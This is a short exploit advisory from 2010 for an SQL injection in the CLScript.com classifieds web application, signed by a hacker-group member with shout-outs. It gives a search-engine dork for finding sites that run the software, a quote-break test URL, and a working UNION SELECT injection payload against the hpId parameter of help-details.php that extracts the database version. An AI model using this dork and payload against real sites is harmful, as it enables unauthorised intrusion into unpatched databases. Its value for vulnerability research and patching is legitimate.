1 # Exploit Title: CLScript.com Classifieds Software SQL Injection
2 Vunerability
3 # Date: 27−4−2010
4 # Author: 41.w4r10r
5 # Vendor Link : http://www.clscript.com/
6 # Version: Web Application
7 # Tested on: Apcahe/Unix
8 # CVE : [if exists]
9 # Dork : intext:"Powered by CLscript.com"
10 # Code :
11 −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
12 ############################################################################
13 #Greetz to all Andhra Hackers and ICW Memebers[Indian Cyber
14 Warriors]
15 #Thanks:
16 SaiSatish,FB1H2S,Godwin_Austin,Micr0,Mannu,Harin,Jappy,Dark_Blue,Hoodlum
17 #Shoutz: hg_H@x0r,r45c4l,Yash,Hackuin,unn4m3d
18 #Catch us at www.andhrahackers.com or www.teamicw.in
19 ############################################################################
20
21
22
23 Exploited Link :
24
25 1) http://example.com/help−details.php?hpId=−38’
26
27
28
29 Live Demo :
30
31 1)
32 http://example.com/help−details.php?hpId=−38+union+select+all+1,version(),3,4,5,6,7−−
33
34
35
36
37 #41.w4r10r mailto:41.w4r10r@andhrahackers.com
Page 1/1
CLScript.com Classifieds Software SQL Injection Vunerability
41.w4r10
04/27/2010